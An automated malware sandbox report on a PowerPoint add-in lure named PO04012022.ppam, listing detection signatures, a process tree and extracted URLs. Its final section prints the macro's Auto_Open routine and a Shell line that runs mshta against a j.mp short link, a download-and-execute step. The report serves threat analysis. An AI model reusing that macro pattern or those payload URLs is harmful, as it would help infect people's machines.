Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO04012022.ppam

Overview

General Information

Sample Name:PO04012022.ppam
Analysis ID:548357
MD5:d58141c856b4831f0c7deb594c4fd25b
SHA1:87ab8351719c70bc5f611d736e32a8a19fce8a2f
SHA256:a0f6d9d905b64be221a64da385ad1fd14542c93b35f23cdcbedf71febc68a505
Tags:ppam
Infos:

Most interesting Screenshot:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Machine Learning detection for sample
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w10x64
  • POWERPNT.EXE (PID: 6376 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" /AUTOMATION -Embedding MD5: 68F52CD14C61DDC941769B55AE3F2EE9)
  • cmd.exe (PID: 6860 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\PO04012022.ppam" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • POWERPNT.EXE (PID: 6952 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppam" /ou " MD5: 68F52CD14C61DDC941769B55AE3F2EE9)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: PO04012022.ppamVirustotal: Detection: 12%Perma Link
Source: PO04012022.ppamReversingLabs: Detection: 27%
Machine Learning detection for sampleShow sources
Source: PO04012022.ppamJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: powerpnt.exeMemory has grown: Private usage: 0MB later: 49MB
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: qwqwae.dString found in binary or memory: http://www.j.mp/
Source: ~DF7C77FA3DFFBB1450.TMP.8.dr, ~DFC4F56B0AF15685FD.TMP.8.drString found in binary or memory: http://www.j.mp/ask
Source: qwqwae.dString found in binary or memory: http://www.j.mp/asksdkaherereroaasdskd
Source: qwqwae.dString found in binary or memory: http://www.j.mp/asksdkahjhhhhtttrrhghghoaasdskd8
Source: qwqwae.dString found in binary or memory: http://www.j.mp/asksdkahjhhhhtttrroaasdskd:
Source: qwqwae.dString found in binary or memory: http://www.j.mp/asksdkahjhjhjaoskdoaasdskd
Source: qwqwae.dString found in binary or memory: http://www.j.mp/asksdkahjhtytytyhoaasdskd:
Source: qwqwae.dString found in binary or memory: http://www.j.mp/asksdkahopopopopdskd
Source: qwqwae.dString found in binary or memory: http://www.j.mp/asksdkazxzxzxzxkd
Source: qwqwae.dString found in binary or memory: http://www.j.mp/askswewewewzxzxkd
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.aadrm.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.aadrm.com/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.cortana.ai
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.office.net
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.onedrive.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://augloop.office.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://cdn.entity.
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://clients.config.office.net/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://config.edge.skype.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://cortana.ai
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://cortana.ai/api
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://cr.office.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://dev.cortana.ai
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://devnull.onenote.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://directory.services.
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://graph.windows.net
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://graph.windows.net/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://invites.office.com/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://lifecycle.office.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://login.windows.local
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://management.azure.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://management.azure.com/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://messaging.office.com/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://ncus.contentsync.
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://officeapps.live.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://onedrive.live.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://osi.office.net
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://otelrules.azureedge.net
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://outlook.office.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://outlook.office.com/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://outlook.office365.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://outlook.office365.com/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://powerlift-user.acompli.net
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://roaming.edog.
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://settings.outlook.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://staging.cortana.ai
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://tasks.office.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://wus2.contentsync.
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 15A6FD1E-D718-4226-8314-16CB9ACBBD54.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: ~DFC4F56B0AF15685FD.TMP.8.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Class1, Function lol, String mshta: Debug.Assert (VBA.Shell("c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd"))Name: lol
Source: ~DFC4F56B0AF15685FD.TMP.8.drOLE, VBA macro line: Debug.Assert (JbxHook_Shell_1_(10, "c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd"))
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
Source: VBA code instrumentationOLE, VBA macro: Module Module11, Function Auto_OpenName: Auto_Open
Source: ~DFC4F56B0AF15685FD.TMP.8.drOLE, VBA macro line: Sub Auto_Open()
